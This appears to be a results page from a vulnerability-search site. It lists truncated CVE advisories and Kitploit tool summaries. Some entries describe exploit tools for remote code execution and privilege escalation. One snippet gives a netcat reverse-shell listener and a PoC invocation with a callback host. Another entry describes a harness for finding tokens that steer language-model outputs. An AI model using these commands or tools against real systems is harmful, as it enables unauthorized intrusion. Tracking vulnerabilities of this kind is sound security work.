Lucene search
+L

603839 matches found

Kitploit
Kitploit
added 2026/09/07 11:41 p.m.7 views

r2frida v6.2.2

r2frida Radare2 and Frida better together Description Self-contained plugin for radare2 that ships frida and allows to instrument local or remote processes using r2 commands instead but not limited to Frida scripts. The radare project provides a complete toolchain for reverse engineering, it's...

6.1AI score
SaveExploits0References4
Kitploit
Kitploit
added 2026/09/07 11:33 p.m.8 views

CVE-2025-59528

Version française CVE-2025-59528 概念验证 专注于在授权环境中对该漏洞进行技术验证的最小化 PoC。 前提条件 您必须在目标 Flowise 仪表板上拥有一个用户账户。 您必须拥有与该账户关联的有效 API 密钥。 您必须在运行 PoC 之前于回调主机上启动监听器(示例:nc -lvn 4444)。 使用示例 首先启动监听器: root@kitploit: nc -lvn 4444 root@kitploit: python3 poc.py --domain example.com --host 10.10.10.1 --port 4444 --api...

10CVSS7.8AI score0.8737EPSS
SaveExploits23References1
NVD
NVD
added 2026/09/07 11:16 p.m.5 views

CVE-2026-86541

knowns versions before 0.30.0 contain a path traversal vulnerability in the handleCodeReplace function that allows attackers to overwrite arbitrary files outside the project root. Attackers can supply absolute paths or relative paths containing directory traversal sequences to write malicious...

8.3CVSS0.00533EPSS
SaveExploits0References5
NVD
NVD
added 2026/09/07 11:16 p.m.4 views

CVE-2026-82758

Improper Authentication vulnerability in ash-project ashauthenticationoauth2server allows an unauthenticated attacker to register OAuth clients even when Dynamic Client Registration is gated by an initial access token. resolvesecret/3 in AshAuthentication.Oauth2Server reached through resolvesecre...

6.3CVSS0.00382EPSS
SaveExploits0References4
Kitploit
Kitploit
added 2026/09/07 11:16 p.m.8 views

DNS-Mayhem-CVE-2026-41096-Deep-Dive

DNS-Mayhem-CVE-2026-41096-Deep-Dive In‑depth technical analysis of CVE‑2026‑41096, a critical heap overflow in Windows DNSAPI.dll enabling remote code execution via crafted DNS responses. Includes attack vectors, patch insights, and defensive guidance for security teams. Overview CVE‑2026‑41096 i...

9.8CVSS8.3AI score0.01932EPSS
SaveExploits6
Kitploit
Kitploit
added 2026/09/07 11:09 p.m.5 views

gradient-untangler

gradient-untangler A local research harness that searches for the exact tokens that make an open-weight language model start its answer the way you specify. Open-weight models ship as ordinary files: config.json, a tokenizer, and one or more .safetensors or .bin shards. A Hugging Face id is only ...

6AI score
SaveExploits0References10
CVE
CVE
added 2026/09/07 11:03 p.m.12 views

CVE-2026-86541

knowns versions before 0.30.0 contain a path traversal vulnerability in the handleCodeReplace() MCP handler function. Attackers can supply absolute paths or relative paths with directory traversal sequences to overwrite arbitrary files outside the project root, potentially writing malicious conte...

8.3CVSS5.9AI score0.00533EPSS
SaveExploits0References5
Vulnrichment
Vulnrichment
added 2026/09/07 11:03 p.m.4 views

CVE-2026-86541 knowns before 0.30.0 Path Traversal via code.replace MCP action

knowns versions before 0.30.0 contain a path traversal vulnerability in the handleCodeReplace function that allows attackers to overwrite arbitrary files outside the project root. Attackers can supply absolute paths or relative paths containing directory traversal sequences to write malicious...

8.3CVSS0.00533EPSS
SaveExploits0References5
Cvelist
Cvelist
added 2026/09/07 11:03 p.m.28 views

CVE-2026-86541 knowns before 0.30.0 Path Traversal via code.replace MCP action

knowns versions before 0.30.0 contain a path traversal vulnerability in the handleCodeReplace function that allows attackers to overwrite arbitrary files outside the project root. Attackers can supply absolute paths or relative paths containing directory traversal sequences to write malicious...

8.3CVSS0.00533EPSS
SaveExploits0References5
OSV
OSV
added 2026/09/07 11:03 p.m.6 views

CVE-2026-86541 knowns before 0.30.0 Path Traversal via code.replace MCP action

knowns versions before 0.30.0 contain a path traversal vulnerability in the handleCodeReplace function that allows attackers to overwrite arbitrary files outside the project root. Attackers can supply absolute paths or relative paths containing directory traversal sequences to write malicious...

7.2CVSS6AI score
SaveExploits0References7
Kitploit
Kitploit
added 2026/09/07 10:56 p.m.6 views

yj_nearbyglasses v1.0.10

yjnearbyglasses attempting to detect smart glasses nearby and warn you. ⚠ WARNING! ⚠ nearby-glasses-alert.pages.dev is NOT RELATED TO MY PROJECT. Many apps in Play Store and App Store look or are even called very similar to Nearby Glasses. They seem to hijack the name and try to make a quick prof...

5.9AI score
SaveExploits0References12
EUVD
EUVD
added 2026/09/07 10:32 p.m.7 views

EUVD-2026-72540

Improper Authentication vulnerability in ash-project ashauthenticationoauth2server allows an unauthenticated attacker to register OAuth clients even when Dynamic Client Registration is gated by an initial access token. resolvesecret/3 in AshAuthentication.Oauth2Server reached through resolvesecre...

6.3CVSS5.9AI score0.00382EPSS
SaveExploits0References4
CVE
CVE
added 2026/09/07 10:32 p.m.13 views

CVE-2026-82758

ash_authentication_oauth2_server (ash-project, Elixir) has an Improper Authentication flaw in resolve_secret/3: any secret-provider return other than {:ok, _} or :error was treated as valid, wrapping nil, false, or "" as {:ok, value}. When the initial_access_token resolves to such an empty value,...

6.3CVSS0.00382EPSS
SaveExploits0References4
OSV
OSV
added 2026/09/07 10:32 p.m.5 views

CVE-2026-82758 ash_authentication_oauth2_server treats an empty resolved secret as valid, opening the gated Dynamic Client Registration endpoint

Improper Authentication vulnerability in ash-project ashauthenticationoauth2server allows an unauthenticated attacker to register OAuth clients even when Dynamic Client Registration is gated by an initial access token. resolvesecret/3 in AshAuthentication.Oauth2Server reached through resolvesecre...

6.3CVSS0.00382EPSS
SaveExploits0References9
OSV
OSV
added 2026/09/07 10:32 p.m.3 views

EEF-CVE-2026-82758 ash_authentication_oauth2_server treats an empty resolved secret as valid, opening the gated Dynamic Client Registration endpoint

Summary Improper Authentication vulnerability in ash-project ashauthenticationoauth2server allows an unauthenticated attacker to register OAuth clients even when Dynamic Client Registration is gated by an initial access token. resolvesecret/3 in AshAuthentication.Oauth2Server reached through...

6.3CVSS5.9AI score0.00382EPSS
SaveExploits0References4
Vulnrichment
Vulnrichment
added 2026/09/07 10:32 p.m.5 views

CVE-2026-82758 ash_authentication_oauth2_server treats an empty resolved secret as valid, opening the gated Dynamic Client Registration endpoint

Improper Authentication vulnerability in ash-project ashauthenticationoauth2server allows an unauthenticated attacker to register OAuth clients even when Dynamic Client Registration is gated by an initial access token. resolvesecret/3 in AshAuthentication.Oauth2Server reached through resolvesecre...

6.3CVSS0.00382EPSS
SaveExploits0References4
Cvelist
Cvelist
added 2026/09/07 10:32 p.m.29 views

CVE-2026-82758 ash_authentication_oauth2_server treats an empty resolved secret as valid, opening the gated Dynamic Client Registration endpoint

Improper Authentication vulnerability in ash-project ashauthenticationoauth2server allows an unauthenticated attacker to register OAuth clients even when Dynamic Client Registration is gated by an initial access token. resolvesecret/3 in AshAuthentication.Oauth2Server reached through resolvesecre...

6.3CVSS0.00382EPSS
SaveExploits0References4
Kitploit
Kitploit
added 2026/09/07 10:16 p.m.5 views

CVE-2026-0073

ADB TLS Auth Bypass Exploit CVE-2026-0073 An automated network scanner and exploitation tool for CVE-2026-0073 , a vulnerability in the Android Debug Bridge daemon adbd that allows unauthenticated Remote Code Execution RCE and interactive shell access via Wireless Debugging. This tool is...

8.8CVSS7.8AI score0.00541EPSS
SaveExploits13
Kitploit
Kitploit
added 2026/09/07 10:13 p.m.6 views

CVE-2026-46215-POC

CVE-2026-46215: DRM GEM changehandle Use-After-Free unprivileged LPE Local privilege escalation via a use-after-free in the DRM core ioctl DRMIOCTLGEMCHANGEHANDLE drmgemchangehandleioctl, ioctl nr 0xD2. Reachable by any user with access to a render node /dev/dri/renderD, granted to the active...

7.8CVSS7.2AI score0.00227EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/09/07 10:11 p.m.4 views

CVE-2026-11991-Exploit

CVE-2026-11991 — FlowForms 未授权表单发布 已认证(贡献者及以上)授权绕过,可在 FlowForms ≤ 1.1.1 中发布任意草稿表单 漏洞概述 属性| 值 ---|--- CVE ID| CVE-2026-11991 CVSS 评分| 6.2 — 中危 CVSS 向量| AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N/E:H/RL:O/RC:C CWE| CWE-639(通过用户可控密钥绕过授权) 产品| FlowForms — WordPress 对话式表单构建插件 受影响版本| 所有版本,最高至 1.1.1 修复版本| 1.1.2...

6AI score
SaveExploits1References1
Rows per page
Query Builder